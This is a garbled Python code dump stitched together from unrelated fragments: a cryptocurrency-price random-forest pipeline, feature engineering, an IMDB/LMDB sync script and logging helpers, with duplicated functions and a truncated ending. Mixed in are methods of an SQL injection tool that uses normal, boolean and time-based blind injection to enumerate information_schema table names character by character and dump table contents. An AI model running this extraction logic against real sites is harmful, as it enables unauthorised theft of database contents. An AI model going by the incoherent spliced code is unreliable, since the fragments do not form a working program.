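# defaults to 0.1, i.e. 10% of the asset's fiat margin per order) might be:
def position_size(margin_fiat, close, order_size=0.1):
    """Coins purchasable with a fixed fraction of the available fiat margin."""
    if close <= 0:
        return 0.0
    return (margin_fiat * order_size) / close

# Example: position_size(10000, 250) -> 4.0 coins, worth 1000 in fiat.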
def getDetection():
    logger.info("Received %s" % (request.url))
    return json.dumps(active.getDetection())
def getDetection():
    global DETECTION
    logger.info("DETECTION status %s" % (str(DETECTION)))
    return DETECTION
def print_banner(self):
    logger.info("Searching now in {0}..".format(self.engine_name))
    return
def main(): index = load_dataset('all_merged', return_index=True) resultFile = './data/datasets/all_merged/estimators/randomforest_hyperparameters.json' estFile = './data/datasets/all_merged/estimators/randomforest_{}.p' hyperparameters = {} for _sym, data in index.items(): features = pd.read_csv(data['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) # Replace nan with infinity so that it can later be imputed to a finite value features = features.replace([np.inf, -np.inf], np.nan) # Derive target classes from closing price target_pct = target_price_variation(features['close']) target = target_binned_price_variation(target_pct, n_bins=2) # target = target_discrete_price_variation(target_pct) # Split data in train and blind test set with 70:30 ratio, # most ML models don't take sequentiality into account, but our pipeline # uses a SimpleImputer with mean strategy, so it's best not to shuffle the data. X_train, X_test, y_train, y_test = train_test_split(features.values, target.values, shuffle=False, test_size=0.3) # Summarize distribution print("Training set: # Features {}, # Samples {}".format( X_train.shape[1], X_train.shape[0])) plot_class_distribution("Training set", _sym, y_train) print("Test set: # Features {}, # Samples {}".format( X_test.shape[1], X_test.shape[0])) plot_class_distribution("Test set", _sym, y_test) if not np.isfinite(X_train).all(): logger.warning("Training x is not finite!") if not np.isfinite(y_train).all(): logger.warning("Training y is not finite!") if not np.isfinite(X_test).all(): logger.warning("Test x is not finite!") if not np.isfinite(y_test).all(): logger.warning("Test y is not finite!") # Build pipeline to be used as estimator in bagging classifier # so that each subset of the data is transformed independently # to avoid contamination between folds. 
pipeline = Pipeline([ ( 'i', SimpleImputer() ), # Replace nan's with the median value between previous and next observation ( 's', RobustScaler() ), # Scale data in order to center it and increase robustness against noise and outliers #('k', SelectKBest()), # Select top 10 best features #('u', RandomUnderSampler()), ('c', RandomForestClassifier()), ]) # Perform hyperparameter tuning of the ensemble with 5-fold cross validation logger.info("Start Grid search") CV_rfc = GridSearchCV(estimator=pipeline, param_grid=RANDOMFOREST_PARAM_GRID, cv=5, n_jobs=4, scoring='neg_mean_squared_error', verbose=1) CV_rfc.fit(X_train, y_train) logger.info("End Grid search") # Take the fitted ensemble with tuned hyperparameters clf = CV_rfc.best_estimator_ # Test ensemble's performance on training and test sets logger.info("Classification report on train set") predictions1 = clf.predict(X_train) print(classification_report(y_train, predictions1)) logger.info("Classification report on test set") predictions2 = clf.predict(X_test) print(classification_report(y_test, predictions2)) stats = { 'score': accuracy_score(y_train, predictions1), 'mse': mean_squared_error(y_train, predictions1), 'test_score': accuracy_score(y_test, predictions2), 'test_mse': mean_squared_error(y_test, predictions2), 'cv_best_mse': -1 * CV_rfc.best_score_, # CV score is negated MSE # 'cv_results': CV_rfc.cv_results_, 'cv_bestparams': CV_rfc.best_params_, } print(stats) with open(estFile.format(_sym), 'wb') as f: pickle.dump(clf, f) hyperparameters[_sym] = { 'estimator': estFile.format(_sym), 'stats': stats } # feature_importances = np.mean([ # p.named_steps.c.feature_importances_ for p in clf.estimators_ # ], axis=0) # importances = {X.columns[i]: v for i, v in enumerate(feature_importances)} # labeled = {str(k): v for k, v in sorted(importances.items(), key=lambda item: -item[1])} # print({ # # 'features':sel_features # 'feature_importances': labeled, # # 'rank': {l: i + 1 for i, l in enumerate(labeled.keys())}, # }) with open(resultFile, 'w') as f: # Save results at every update json.dump(hyperparameters, f, indent=4) print("--- end ---")
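# NOTE (editor's sketch): RANDOMFOREST_PARAM_GRID is imported from elsewhere and
# not listed here. Since the estimator handed to GridSearchCV is a Pipeline whose
# classifier step is named 'c', the grid keys must be prefixed with 'c__'; a
# plausible grid (an assumption, not the project's actual values) would look like:
RANDOMFOREST_PARAM_GRID = {
    'c__n_estimators': [100, 200, 500],
    'c__max_depth': [4, 8, None],
    'c__min_samples_split': [2, 10],
    'c__class_weight': [None, 'balanced'],
}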
    # Remove records with duplicate imdbid
    imdb_manager.remove_duplicate_imdb()
    # Backup
    imdb_manager.backup()
    # Export the IMDB database to LMDB
    imdb_manager.export2lmdb(lmdb_operator.HOST, lmdb_operator.DB)
    # Export the imdbids to a csv file
    imdbcsv_path = imdb_manager.imdbid2csv()

    # lmdb
    # Import the imdbids into LMDB
    lmdb_manager.import_imdbid(imdbcsv_path)
    # Update movies that other sources (開眼, 豆瓣, ...) have but the imdb source could not find
    lmdb_manager.update_imdb_miss_movies()
    # Update movies parsed from the imdb website
    lmdb_manager.update_imdb_parsed_movies()

    # fixme
    """
    The current approach trusts that the imdbid obtained through imdbpy is correct and
    treats the imdb database as the primary source, falling back to scraping the imdb
    website only when the data is missing. If the imdbid returned by imdbpy is wrong it
    can never be corrected -- how can this be updated automatically?
    """
    ed = datetime.datetime.now()
    message = 'start:%s \t end:%s' % (st, ed)
    logger.info(message)
except Exception:
    print traceback.format_exc()
    sendmail(traceback.format_exc())
def get_tables(self): # 若databases_name未设置,就跑一下 if len(self.databases_name) == 0: logger.debug("Set the parameters of the self.databases_name...") SqliDatabases.get_database(self) # 每个databases_name需要跑一次tables_name for database_name in self.databases_name: # 开始跑database_name logger.debug("Start sqli databases %s's tables_name" % database_name) tables_name = [] logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") # 先注tables的数量 tables_number = normal_injection( select='COUNT(*)', source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Table account sqli success...The tables_number is %d..." % tables_number) print "[*] tables_number: %d" % tables_number # 每个循环跑一次tables的数据 for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True): # 首先是tablename的长度 logger.debug("Start %dth table length sqli..." % (i + 1)) table_name_len = normal_injection( select='length(`table_name`)', source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tablename logger.debug("Start %dth table name sqli..." % (i + 1)) table_name = normal_injection( select='`table_name`', source='information_schema.tables', conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把table_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") retVal = build_injection(select="COUNT(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) tables_number = int(retVal) logger.debug( "Tables amount sqli success...The tables_number is %d..." % tables_number) logger.info("[*] tables_number: %d" % tables_number) for i in range(0, int(tables_number)): # 然后注tables_name 的 length logger.debug("Start %dth table length sqli..." % (i + 1)) retVal = build_injection( select="length(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) table_name_len = int(retVal) logger.debug( "%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tables名字 # 清空table_name table_name = "" logger.debug("Start %dth table sqli..." 
% (i + 1)) for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False): retVal = build_injection( select="ascii(substring(`table_name`," + repr(j + 1) + ",1))", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) table_name += chr(retVal) logger.debug( "%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把table_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") retVal = time_injection(select="COUNT(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) tables_number = int(retVal) logger.debug( "Tables amount sqli success...The tables_number is %d..." % tables_number) logger.info("[*] tables_number: %d" % tables_number) for i in range(0, int(tables_number)): # 然后注tables_number 的length logger.debug("Start %dth table length sqli..." % (i + 1)) retVal = time_injection(select="length(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) table_name_len = int(retVal) logger.debug( "%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tables名字 # 清空table_name table_name = "" logger.debug("Start %dth table sqli..." % (i + 1)) for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False): retVal = time_injection( select="ascii(substring(`table_name`," + repr(j + 1) + ",1))", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) table_name += chr(retVal) logger.debug( "%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把tables_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) self.tables_name[database_name] = tuple(tables_name) print "[*] tables_name list: ", self.tables_name
def getActive():
    global active
    logger.info("active status %s" % (str(active)))
    return active
def get_content_count(self, database_name, table_name): # 开始注内容 logger.debug("Start sqli table %s content amount..." % table_name) # 先GET if self.sqlirequest == "GET": logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) # 注数据的数量 content_count = normal_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content account sqli success...The count is %d..." % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = build_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = time_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count # 然后是post elif self.sqlirequest == "POST": logger.debug("The sqlirequest is %s, start sqli contents..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) # 注数据的数量 content_count = normal_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content account sqli success...The count is %d..." % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = build_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = time_injection(select="count(*)", source=database_name + "." 
+ table_name, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug( "Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count
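# NOTE (editor's sketch): all three branches above (normal, build, time) recover
# the same value; run directly against the database, the query they emulate is simply:
database_name, table_name = 'testdb', 'users'   # hypothetical names for illustration
count_sql = "SELECT count(*) FROM " + database_name + "." + table_name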
from lib.log import logger

if __name__ == '__main__':
    logger.info("test info")
    logger.debug("test debug")
    logger.warning("test warning")
    logger.error("test error")
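# NOTE (editor's sketch): lib.log itself is not included in this listing. A
# minimal module exposing a pre-configured `logger` that the test above could
# import might be (logger name and format are assumptions):
import logging

logger = logging.getLogger('sWebScanner')
logger.setLevel(logging.DEBUG)
_handler = logging.StreamHandler()
_handler.setFormatter(logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s'))
logger.addHandler(_handler)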
def build_improved_dataset(source_index, W=10): _dataset = load_dataset(source_index, return_index=True) index = {} for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ohlcv = _df[entry['features']['ohlcv']] ta = _df[entry['features']['ta']] ta_7 = _df[entry['features']['ta_7d']] cm = _df[entry['features']['cm']] ohlcv_stats = pd.DataFrame(index=ohlcv.index) #ohlcv_stats['volume'] = ohlcv.volume #ohlcv_stats['volume_pct'] = ohlcv.volume.pct_change() #ohlcv_stats['close_pct'] = ohlcv.close.pct_change() ohlcv_stats['day_range_pct'] = (ohlcv.high - ohlcv.low).pct_change( ) # Showld always be > 0, price oscillation range for current day ohlcv_stats[ 'direction'] = ohlcv.close - ohlcv.open # Price direction for the day green > 0, red < 0. Modulus is range. cm_picked = pd.DataFrame(index=ohlcv.index) if 'adractcnt' in cm.columns: cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change() # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change() # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change() # if 'splycur' in cm.columns: ## Correlated with volume and close # cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined) if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns: # I want to represent miners earnings (fees + issued coins) vs amount transacted in that interval cm_picked['earned_vs_transacted'] = ( cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv if 'isstotntv' in cm.columns: # isstotntv is total number of coins mined in the time interval # splycur is total number of coins mined (all time) total_mined = cm.isstotntv.rolling( 365, min_periods=7).sum() # total mined in a year cm_picked['isstot365_isstot1_pct'] = (total_mined / cm.isstotntv).pct_change() if 'splycur' in cm.columns and 'isstotntv' in cm.columns: cm_picked['splycur_isstot1_pct'] = (cm.splycur / cm.isstotntv).pct_change() if 'hashrate' in cm.columns: #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change() #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change() cm_picked['hashrate_pct'] = cm.hashrate.pct_change() if 'roi30d' in cm.columns: cm_picked['roi30d'] = cm.roi30d if 'isstotntv' in cm.columns: cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change() if 'feetotntv' in cm.columns: cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change() if 'txtfrcount' in cm.columns: cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change() cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change() if 'vtydayret30d' in cm.columns: cm_picked['vtydayret30d'] = cm.vtydayret30d if 'isscontpctann' in cm.columns: cm_picked['isscontpctann'] = cm.isscontpctann ta_picked = pd.DataFrame(index=ta.index) # REMA / RSMA are already used and well-estabilished in ATSA, # I'm taking the pct change since i want to encode the relative movement of the ema's not their positions # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change() # ta_picked['rsma_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rsma_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change() # Stoch is a momentum indicator comparing a particular closing price of a security to a 
range of its prices # over a certain period of time. # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or # by taking a moving average of the result. # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values. # IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling( 3).mean() / 100 #Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows # the relationship between two moving averages of a security’s price. # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA. # A nine-day EMA of the MACD called the "signal line," is then plotted on top of the MACD line, # which can function as a trigger for buy and sell signals. # Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security # when the MACD crosses below the signal line. # Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways, # but the more common methods are crossovers, divergences, and rapid rises/falls. signal_line = builder.exponential_moving_average(ta.macd_12_26, 9) ta_picked['macd_12_26_signal'] = ( ta.macd_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change( ) # Information about slope # PPO is identical to the moving average convergence divergence (MACD) indicator, # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference. signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9) ta_picked['ppo_12_26_signal'] = ( ta.ppo_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change( ) # Information about slope # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether # a stock is being accumulated or distributed. # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow. # This provides insight into how strong a trend is. If the price is rising but the indicator is falling # this indicates that buying or accumulation volume may not be enough to support # the price rise and a price decline could be forthcoming. # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify # divergences by simply looking at the sign of M. # Another insight would be given by the slope (ie pct_change) ta_picked['adi_pct'] = ta.adi.pct_change() ta_picked['adi_close_convergence'] = convergence_between_series( ta.adi, ohlcv.close, 3) # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL. # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it ta_picked['rsi_14_div100'] = ta.rsi_14 / 100 # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold # signals using both prices and volume data. The oscillator moves between 0 and 100. # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold, # although levels of 90 and 10 are also used as thresholds. # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while # the price is falling or flat, the price could start rising. 
ta_picked['mfi_14_div100'] = ta.mfi_14 / 100 # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators # such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator. # It measures momentum on both up and down days and does not smooth results, triggering more frequent # oversold and overbought penetrations. The indicator oscillates between +100 and -100. # Many technical traders add a 10-period moving average to this oscillator to act as a signal line. # The oscillator generates a bullish signal when it crosses above the moving average and a # bearish signal when it drops below the moving average. ta_picked['cmo_14_div100'] = ta.cmo_14 / 100 signal_line = builder.simple_moving_average(ta.cmo_14, 10) ta_picked['cmo_14_signal'] = (ta.cmo_14 - signal_line) / 100 # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price. # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying. # Despite being plotted on a price chart and measured numerically, # the actual individual quantitative value of OBV is not relevant. # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point, # meaning the real number value of OBV arbitrarily depends on the start date. # Instead, traders and analysts look to the nature of OBV movements over time; # the slope of the OBV line carries all of the weight of analysis. => We want percent change ta_picked['obv_pct'] = ta.obv.pct_change() ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change() # Strong rallies in price should see the force index rise. # During pullbacks and sideways movements, the force index will often fall because the volume # and/or the size of the price moves gets smaller. # => Encoding the percent variation could be a good idea ta_picked['fi_13_pct'] = ta.fi_13.pct_change() ta_picked['fi_50_pct'] = ta.fi_50.pct_change() # The Aroon Oscillator is a trend-following indicator that uses aspects of the # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend # and the likelihood that it will continue. # It moves between -100 and 100. A high oscillator value is an indication of an uptrend # while a low oscillator value is an indication of a downtrend. ta_picked['ao_14'] = ta.ao_14 / 100 # The average true range (ATR) is a technical analysis indicator that measures market volatility # by decomposing the entire range of an asset price for that period. # ATRP is pct_change of volatility ta_picked['atrp_14'] = ta.atrp_14 # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis # to evaluate and measure volume surges and to compare trading volume to the average longer-term volume. # PVO does not analyze price and it is based solely on volume. # It compares fast and slow volume moving averages by showing how short-term volume differs from # the average volume over longer-term. # Since it does not care a trend's factor in its calculation (only volume data are used) # this technical indicator cannot be used alone to predict changes in a trend. 
ta_picked['pvo_12_26'] = ta.pvo_12_26 # IGNORED: tsi, wd, adx, #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Build the dataframe with base features # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)] ohlc = ohlcv[['close', 'volume']].pct_change() lagged_ohlc = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Add lagged features to the dataframe improved_df = pd.concat( [ohlcv_stats, lagged_ohlc, cm_picked, ta_picked], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows improved_df = improved_df[30:] # Drop columns whose values are all nan or inf with pd.option_context('mode.use_inf_as_na', True): # Set option temporarily improved_df = improved_df.dropna(axis='columns', how='all') # Save the dataframe improved_df.to_csv( 'data/datasets/all_merged/csv/{}_improved.csv'.format( _sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') improved_df.to_excel( 'data/datasets/all_merged/excel/{}_improved.xlsx'.format( _sym.lower()), index=True, index_label='Date') unlagged_df = improved_df.loc[:, [ c for c in improved_df.columns if not '_lag' in c ]] unlagged_df['target_pct'] = _target.loc[improved_df.index]['pct'] unlagged_df['target_binary_bin'] = _target.loc[ improved_df.index]['binary_bin'] plot_correlation_matrix( unlagged_df.corr(), unlagged_df.columns, title='{} Correlation matrix'.format(_sym), save_to='data/datasets/all_merged/{}_improved_corr.png'.format( _sym)) #decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df) # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}_improved.csv'.format( _sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}_improved.xlsx'.format( _sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'improved': [c for c in improved_df.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index_improved.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4) # Find common features common_features = [] for _sym, entry in index.items(): features = entry['features']['improved'] if not common_features: # if common_features is empty, common_features are all the current features common_features = features not_common_features = [] for f in common_features: # remove features from common_features which are not in features if f not in features: not_common_features.append(f) for f in not_common_features: common_features.remove(f) for _sym, entry in index.items(): entry['features']['common'] = common_features # Save index again with open('data/datasets/all_merged/index_improved.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4)
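# NOTE (editor's sketch): convergence_between_series is referenced above but not
# defined in this listing. Following the ADI comment (fit a line to each series
# over a short window and compare the sign of the slopes), one possible implementation is:
import numpy as np
import pandas as pd

def convergence_between_series(s1, s2, window):
    """1 where the rolling slopes of the two series share the same sign, else 0."""
    x = np.arange(window)

    def slope(s):
        return s.rolling(window).apply(
            lambda y: np.polyfit(x, y, 1)[0] if np.isfinite(y).all() else np.nan,
            raw=True)

    return (np.sign(slope(s1)) == np.sign(slope(s2))).astype(int)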
def run_content(self):
    if len(self.columns_name) == 0:
        SqliColumns.get_columns(self)
    # Unpack in a loop and start the injection
    for database_name in self.columns_name:
        for table_name in self.columns_name[database_name]:
            # Get the number of rows; if it differs from self.content_count, update self.content_count
            content_counts = self.get_content_count(database_name, table_name)
            if content_counts == 0:
                logger.warning('Database %s Table %s is empty...' % (database_name, table_name))
                continue
            elif content_counts != self.content_count:
                logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts))
                self.content_count = content_counts
            else:
                pass
            # Declare a PrettyTable to store the data
            content = PrettyTable(list(self.columns_name[database_name][table_name]))
            content.padding_width = 1
            content.align = "r"
            # Each table must be injected once per row to retrieve
            for limits in xrange(self.content_count):
                # Declare a queue to store the returned values
                result = Queue.Queue()
                # Declare the thread list, the results list and the list of values inserted into the table
                threads = []
                results = []
                contents = []
                # Start the multithreaded injection
                logger.debug("Start multithreading Sqli...")
                for column_name in self.columns_name[database_name][table_name]:
                    # Start one thread to inject one column
                    try:
                        t = threading.Thread(target=self.get_content,
                                             name='thread for %s' % column_name,
                                             args=(result, database_name, table_name, column_name, limits))
                        t.start()
                    except:
                        logger.error('Thread error...')
                    threads.append(t)
                # Wait for all threads to finish
                for t in threads:
                    t.join()
                # Collect the data returned by the injections, one row of content
                while not result.empty():
                    results.append(result.get())
                # Process the returned data (match values to their columns)
                for i in list(self.columns_name[database_name][table_name]):
                    for item in results:
                        if item[0] == i:
                            contents.append(item[1])
                        else:
                            continue
                # Insert the row
                content_str = ','.join(contents)
                logger.info("Sqli success content is %s" % content_str)
                content.add_row(contents)
            # Print the table
            logger.debug("Database %s Table %s sqli success..." % (database_name, table_name))
            print "[*] Database %s Table %s content:" % (database_name, table_name)
            print content
def build_faceted_dataset(source_index, W=10): _dataset = load_dataset(source_index, return_index=True) index = {} for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ta = _df[entry['features']['ta']] cm = _df[entry['features']['cm']] # Price history facet (Daily variation of ohlc in last W trading days) ohlc = _df[['open', 'high', 'low', 'close']].pct_change() ohlc.columns = ['open_pct', 'high_pct', 'low_pct', 'close_pct'] history_facet = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Price trend facet (REMA/RSMA, MACD, AO, ADX, WD+ - WD-) trend_facet = ta[[ "rsma_5_20", "rsma_8_15", "rsma_20_50", "rema_5_20", "rema_8_15", "rema_20_50", "macd_12_26", "ao_14", "adx_14", "wd_14" ]] # Volatility facet (CMO, ATRp) volatility_facet = ta[["cmo_14", "atrp_14"]] # Volume facet (Volume pct, PVO, ADI, OBV) volume_facet = pd.concat([ _df.volume.pct_change().replace([np.inf, -np.inf], 0), ta[["pvo_12_26", "adi", "obv"]] ], axis='columns', verify_integrity=True, sort=True, join='inner') # On-chain facet cm_1 = cm.reindex(columns=[ 'adractcnt', 'txtfrvaladjntv', 'isstotntv', 'feetotntv', 'splycur', 'hashrate', 'txtfrcount' ]).pct_change() cm_2 = cm.reindex(columns=['isscontpctann']) chain_facet = pd.concat([cm_1, cm_2], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop columns whose values are all nan or inf from each facet with pd.option_context('mode.use_inf_as_na', True): # Set option temporarily history_facet = history_facet.dropna(axis='columns', how='all') trend_facet = trend_facet.dropna(axis='columns', how='all') volatility_facet = volatility_facet.dropna(axis='columns', how='all') volume_facet = volume_facet.dropna(axis='columns', how='all') chain_facet = chain_facet.dropna(axis='columns', how='all') improved_df = pd.concat([ history_facet, trend_facet, volatility_facet, volume_facet, chain_facet ], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows improved_df = improved_df[30:] # Save the dataframe improved_df.to_csv( 'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') improved_df.to_excel( 